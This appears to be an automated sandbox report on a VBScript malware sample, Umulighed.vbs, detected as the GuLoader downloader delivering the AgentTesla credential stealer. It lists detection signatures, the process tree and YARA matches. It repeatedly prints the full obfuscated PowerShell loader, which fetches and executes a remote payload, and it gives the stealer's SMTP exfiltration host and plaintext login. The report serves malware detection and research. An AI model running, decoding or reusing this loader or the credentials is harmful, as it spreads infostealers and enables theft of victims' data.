
Windows Analysis Report
Umulighed.vbs

Overview

General Information

Sample name:Umulighed.vbs
Analysis ID:1430859
MD5:7a879857b435057c4825e33b280baa15
SHA1:d79ea735b0440d929bb6b046974e03915cb8bfd8
SHA256:d15c94ea77716eb5071b879c630b22509e0cee099bb7f9d3f823b8fb57f77d6d
Tags:vbs

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6764 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? 
FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BasliDdbolfI.oniyChesi. 
ChrosStuckpMetc,lBrn.oi AnortSomew(Re,br$savanCS.egeaRe.lucArgumhVit eiBastan.lassnBegreaIndurtOp.aveA gra)Sko.e ');$Horrify=$paradropping[0];Jots (Disken 'Hud m$UnodogIndkrlclarsoEddiebCalviaBetonl,lane: SkabP O.taoDgnbulGsbovuSubs.p.earlhSk.ull DeseoPensiiventis GrodbInteroBenc i NonmoKantntUdpumiOutracFyres=LevneNSageseUnsigwPrev -Nek.aOYezgabRealijForsveotorhc ameytSkj e ladSMo tayNonimsFolket S,uleSrkenm Sati.NonreN Antie nvent Pali.IsotoWLdrepe PermbSevenCPalmilHjer iDisape illanSpunstPlugg ');Jots (Disken '.ypos$mi.ilPPanteoRiedelDole uGenerp RefuhCaballUndreoIrreliUnsimsSh,oubhaando Dollitorv.oTrotst CariiYu,escPigta. ugsHporkleHorsta TomodSe aseAmuserunlegsRepro[Gnide$Cey oOFasherBispelvide oforespTritusMorda]Rh zo=Etude$ HavoOUnbacr Vovet LiquhForvao,ipoga.nvinrDriftsU.ganeT ivinNulpuiPlayftJeanieTryne ');$cognitional=Disken 'MinimPG.asfoTr,pulIncoru H.pop UnobhTirzalschooo Hampi eurisT angbSm,aroVi,iliTitleoGry.ttPr.cei St.tcAandf. InfoDOpe.aoRffelwSrprgn Phlol NaggoSvingaUxorid ShriFbagiui.empelUnd reSubs (Optog$B.rbaHAnspno I dgrPartirSemiciBjrgbfAddabyunder,Udgan$ForsiTAdumbamar,emTerzea ScalrSentiiWinl.ncrispd Pu.isOestr1 A.ts1 Wals6Frnd.) 
Rust ';$cognitional=$Synkronsvmnings[1]+$cognitional;$Tamarinds116=$Synkronsvmnings[0];Jots (Disken ' ,idi$Detecg erenlVikinoE strbJulusaHstpalPib n:MelamR ArchaSovevds,ckeiVeloko kl.us Fug iSuppogdslernteledaSkraelSysteematrarIndl,sAfsky=Sprac( Ko.mTSpasmeLejevs.ostptSter.-PoculP LuggaRebsltMislah Ress Attra$FrenuT ,nisaAmob,mAksela FradrAff.iiDelegnEn obd Udlas Supe1,yper1Centr6Uns r)Du ll ');while (!$Radiosignalers) {Jots (Disken 'hova $S.inkgElectlBunkeo BrowbVarooaLarynlSnitm:A apeLValraeAnalynFeltndTeknoaSamleb DandlkappeeProla=Letal$ IntotKle krSymfou Cal,eUddel ') ;Jots $cognitional;Jots (Disken 'VintrSSkoletOpkbeaHoughrEkspotCotra-dia.oS Un,elCiseleTilste Aal.p Rend Wali4Overt ');Jots (Disken 'Rekap$DunlegCoadvlReh do BnkhbB,trya Un el.torm:InkosR akaoaTheridApostiCratioUnerosB seji Lse gDyscrnTradua,arumlUnikueBags rKlam.sGesjf=Nonre(Ekv.pTOvenfes,kyss Leopttrykv-Bero.PKrigsa RvestAdvarhFlytt estl$ScripTNonsea,ragtmOwleraHyp rr Mor.i DissnFor.idSk ifs Turi1Stra 1Befol6Uforb)Iniss ') ;Jots (Disken 'Temat$Tilb gPen,olReba.oUneteb NondaDamaslTilre:KlasspFi.uroNominrSlipbt .ndsrTilbrt LogatRecolePretar FrateSp.acrPewee= Post$Over gLu url.mhtto SclebKaktua Hegul Joen:ElektDArgumiSeks,fLiparf Pe,cu charsExt at.uple+Titu,+Brobu%Mine $Foll pSt,olaManeurGa,mmaE docd Tranr.rangoAscocpBe,idp Tel.iHastenresprgSkovm.UnocccvenenoBurkluP.cisnhurrytSt.lk ') ;$Horrify=$paradropping[$portrtterer];}Jots (Disken '.mili$pro.rgsaniklUdtolo nfanbLacquaInddmlKolos: rgaMPressaLsepug Satae Wirir MakraEsk,d1 Udkl1Admin6uncov mache=Grami OverlGI soleboto.t apul- ankeCOve,loEndaon,gnaatThirse,lydinBetegtExplo Si i$ overTLnmodaS eepmOversaNicobrTa,shi AnginStilfdvamsescribb1 Ant.1Sylfe6 Fl,r ');Jots (Disken 'G.lde$Forthg,errelLedeto LipibClaspanoncol,roli:NoninPVognprGleadeMargucIhndeoMultinBothrjForm eUnmodcSta dtPro.euRetnir.andhi Lea,nForcogSugep Svag.=Agraf J.ggl[ D ceS p.odyNolossDuffet Bes e isjomPrewe. 
OperCKldeboAfstenRestavEksemeCorner saurtH men]Ste b:Whett:forfrFBevaerskarnoUdf dmPneumB OrdraH.emtsBaldeeNovel6Elefa4 RapsSKlve,tM.wsarLang iS,ortnCrystgGene.(Smer $TidssM DentaReducgSqu.re NederValfaaBo,ge1.ropo1Veste6 Rejs)Terfe ');Jots (Disken 'Carbo$.eepiggan ilKost oTripobHet raMttetl t,le:Trea.rPassaeOvergbRibbeoBi liuL.vemnSal,ed SobbiTeoren.ammegSk.smnFernaeTvrdrsToldasDo bl Crimb=Manip Affal[ScottSBusteyFulvosrejsetSieseeKabelmSpdbr.BurstT ChokeProgrx Skjotita.i.Br.vbEKoordnvrdilcSlagsopelmadT.knii Ke,nnA.oidgUnimm]Under: Rena:JynxgASemitSSki,dCPashaI LivsI ouch.InputG ,romeFrko tNuzzlS B uit,anatrRestoi Kllen KotegS,erm(Cilio$ Ud oPanasar .vede.ewatcWeedio Am tnSn,bojDioxaeZarenc Bantt gennuForlorElectiD agln PostgToti,)Misav ');Jots (Disken ' Jasm$ForsggDandrlBet.yoRecanbUdgr,aSalutlRural:selskjRefera H.wfmWittebTeh so abrirTopfoeGalletPer mtNedereBelt.nCuber= Lykk$HospirConsueOvertbKedeloDuperuU.salnAadredUdmaniNonadnK.ntogFilmfnTashie SupesSc.nesDissi.NonilsRoseeuUdklabMonchs Sig.tTrinnrWhi.eiPulchnvraisgKunde( Mall3Trimo4Blrek7 tor0Wra p6Telet7Trans,Fo tr2 Boks8go.eb6reapp7opfin3M jor)irri, ');Jots $jamboretten;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7108 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6208 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? 
FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BasliDdbolfI.oniyChesi. 
ChrosStuckpMetc,lBrn.oi AnortSomew(Re,br$savanCS.egeaRe.lucArgumhVit eiBastan.lassnBegreaIndurtOp.aveA gra)Sko.e ');$Horrify=$paradropping[0];Jots (Disken 'Hud m$UnodogIndkrlclarsoEddiebCalviaBetonl,lane: SkabP O.taoDgnbulGsbovuSubs.p.earlhSk.ull DeseoPensiiventis GrodbInteroBenc i NonmoKantntUdpumiOutracFyres=LevneNSageseUnsigwPrev -Nek.aOYezgabRealijForsveotorhc ameytSkj e ladSMo tayNonimsFolket S,uleSrkenm Sati.NonreN Antie nvent Pali.IsotoWLdrepe PermbSevenCPalmilHjer iDisape illanSpunstPlugg ');Jots (Disken '.ypos$mi.ilPPanteoRiedelDole uGenerp RefuhCaballUndreoIrreliUnsimsSh,oubhaando Dollitorv.oTrotst CariiYu,escPigta. ugsHporkleHorsta TomodSe aseAmuserunlegsRepro[Gnide$Cey oOFasherBispelvide oforespTritusMorda]Rh zo=Etude$ HavoOUnbacr Vovet LiquhForvao,ipoga.nvinrDriftsU.ganeT ivinNulpuiPlayftJeanieTryne ');$cognitional=Disken 'MinimPG.asfoTr,pulIncoru H.pop UnobhTirzalschooo Hampi eurisT angbSm,aroVi,iliTitleoGry.ttPr.cei St.tcAandf. InfoDOpe.aoRffelwSrprgn Phlol NaggoSvingaUxorid ShriFbagiui.empelUnd reSubs (Optog$B.rbaHAnspno I dgrPartirSemiciBjrgbfAddabyunder,Udgan$ForsiTAdumbamar,emTerzea ScalrSentiiWinl.ncrispd Pu.isOestr1 A.ts1 Wals6Frnd.) 
Rust ';$cognitional=$Synkronsvmnings[1]+$cognitional;$Tamarinds116=$Synkronsvmnings[0];Jots (Disken ' ,idi$Detecg erenlVikinoE strbJulusaHstpalPib n:MelamR ArchaSovevds,ckeiVeloko kl.us Fug iSuppogdslernteledaSkraelSysteematrarIndl,sAfsky=Sprac( Ko.mTSpasmeLejevs.ostptSter.-PoculP LuggaRebsltMislah Ress Attra$FrenuT ,nisaAmob,mAksela FradrAff.iiDelegnEn obd Udlas Supe1,yper1Centr6Uns r)Du ll ');while (!$Radiosignalers) {Jots (Disken 'hova $S.inkgElectlBunkeo BrowbVarooaLarynlSnitm:A apeLValraeAnalynFeltndTeknoaSamleb DandlkappeeProla=Letal$ IntotKle krSymfou Cal,eUddel ') ;Jots $cognitional;Jots (Disken 'VintrSSkoletOpkbeaHoughrEkspotCotra-dia.oS Un,elCiseleTilste Aal.p Rend Wali4Overt ');Jots (Disken 'Rekap$DunlegCoadvlReh do BnkhbB,trya Un el.torm:InkosR akaoaTheridApostiCratioUnerosB seji Lse gDyscrnTradua,arumlUnikueBags rKlam.sGesjf=Nonre(Ekv.pTOvenfes,kyss Leopttrykv-Bero.PKrigsa RvestAdvarhFlytt estl$ScripTNonsea,ragtmOwleraHyp rr Mor.i DissnFor.idSk ifs Turi1Stra 1Befol6Uforb)Iniss ') ;Jots (Disken 'Temat$Tilb gPen,olReba.oUneteb NondaDamaslTilre:KlasspFi.uroNominrSlipbt .ndsrTilbrt LogatRecolePretar FrateSp.acrPewee= Post$Over gLu url.mhtto SclebKaktua Hegul Joen:ElektDArgumiSeks,fLiparf Pe,cu charsExt at.uple+Titu,+Brobu%Mine $Foll pSt,olaManeurGa,mmaE docd Tranr.rangoAscocpBe,idp Tel.iHastenresprgSkovm.UnocccvenenoBurkluP.cisnhurrytSt.lk ') ;$Horrify=$paradropping[$portrtterer];}Jots (Disken '.mili$pro.rgsaniklUdtolo nfanbLacquaInddmlKolos: rgaMPressaLsepug Satae Wirir MakraEsk,d1 Udkl1Admin6uncov mache=Grami OverlGI soleboto.t apul- ankeCOve,loEndaon,gnaatThirse,lydinBetegtExplo Si i$ overTLnmodaS eepmOversaNicobrTa,shi AnginStilfdvamsescribb1 Ant.1Sylfe6 Fl,r ');Jots (Disken 'G.lde$Forthg,errelLedeto LipibClaspanoncol,roli:NoninPVognprGleadeMargucIhndeoMultinBothrjForm eUnmodcSta dtPro.euRetnir.andhi Lea,nForcogSugep Svag.=Agraf J.ggl[ D ceS p.odyNolossDuffet Bes e isjomPrewe. 
OperCKldeboAfstenRestavEksemeCorner saurtH men]Ste b:Whett:forfrFBevaerskarnoUdf dmPneumB OrdraH.emtsBaldeeNovel6Elefa4 RapsSKlve,tM.wsarLang iS,ortnCrystgGene.(Smer $TidssM DentaReducgSqu.re NederValfaaBo,ge1.ropo1Veste6 Rejs)Terfe ');Jots (Disken 'Carbo$.eepiggan ilKost oTripobHet raMttetl t,le:Trea.rPassaeOvergbRibbeoBi liuL.vemnSal,ed SobbiTeoren.ammegSk.smnFernaeTvrdrsToldasDo bl Crimb=Manip Affal[ScottSBusteyFulvosrejsetSieseeKabelmSpdbr.BurstT ChokeProgrx Skjotita.i.Br.vbEKoordnvrdilcSlagsopelmadT.knii Ke,nnA.oidgUnimm]Under: Rena:JynxgASemitSSki,dCPashaI LivsI ouch.InputG ,romeFrko tNuzzlS B uit,anatrRestoi Kllen KotegS,erm(Cilio$ Ud oPanasar .vede.ewatcWeedio Am tnSn,bojDioxaeZarenc Bantt gennuForlorElectiD agln PostgToti,)Misav ');Jots (Disken ' Jasm$ForsggDandrlBet.yoRecanbUdgr,aSalutlRural:selskjRefera H.wfmWittebTeh so abrirTopfoeGalletPer mtNedereBelt.nCuber= Lykk$HospirConsueOvertbKedeloDuperuU.salnAadredUdmaniNonadnK.ntogFilmfnTashie SupesSc.nesDissi.NonilsRoseeuUdklabMonchs Sig.tTrinnrWhi.eiPulchnvraisgKunde( Mall3Trimo4Blrek7 tor0Wra p6Telet7Trans,Fo tr2 Boks8go.eb6reapp7opfin3M jor)irri, ');Jots $jamboretten;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5480 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 5440 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • newfile.exe (PID: 6112 cmdline: "C:\Users\user\AppData\Roaming\newfile\newfile.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 6884 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • newfile.exe (PID: 6152 cmdline: "C:\Users\user\AppData\Roaming\newfile\newfile.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}
Yara matches (Source / Rule / Description / Author / Strings):
Source: 00000009.00000002.2957213484.0000000022E8E000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 00000001.00000002.2261833973.00000221E3C09000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_5; Description: Yara detected GuLoader; Author: Joe Security
Source: 00000009.00000002.2957213484.0000000022EB1000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 00000004.00000002.2006054606.0000000008700000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_5; Description: Yara detected GuLoader; Author: Joe Security
Source: 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Yara matches (Source / Rule / Description / Author / Strings):
Source: amsi64_6912.amsi.csv; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Strings:
  • 0x100f9:$b2: ::FromBase64String(
  • 0xd481:$s1: -join
  • 0x6c2d:$s4: +=
  • 0x6cef:$s4: +=
  • 0xaf16:$s4: +=
  • 0xd033:$s4: +=
  • 0xd31d:$s4: +=
  • 0xd463:$s4: +=
  • 0xf6b5:$s4: +=
  • 0xf735:$s4: +=
  • 0xf7fb:$s4: +=
  • 0xf87b:$s4: +=
  • 0xfa51:$s4: +=
  • 0xfad5:$s4: +=
  • 0xdb9e:$e4: Get-WmiObject
  • 0xdd8d:$e4: Get-Process
  • 0xdde5:$e4: Start-Process
Source: amsi32_6208.amsi.csv; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Strings:
  • 0x1005e:$b2: ::FromBase64String(
  • 0xd481:$s1: -join
  • 0x6c2d:$s4: +=
  • 0x6cef:$s4: +=
  • 0xaf16:$s4: +=
  • 0xd033:$s4: +=
  • 0xd31d:$s4: +=
  • 0xd463:$s4: +=
  • 0xf6b5:$s4: +=
  • 0xf735:$s4: +=
  • 0xf7fb:$s4: +=
  • 0xf87b:$s4: +=
  • 0xfa51:$s4: +=
  • 0xfad5:$s4: +=
  • 0xdb9e:$e4: Get-WmiObject
  • 0xdd8d:$e4: Get-Process
  • 0xdde5:$e4: Start-Process
  • 0x17a75:$e4: Get-Process

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs", ProcessId: 6764, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\newfile\newfile.exe, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 5440, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\newfile
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF 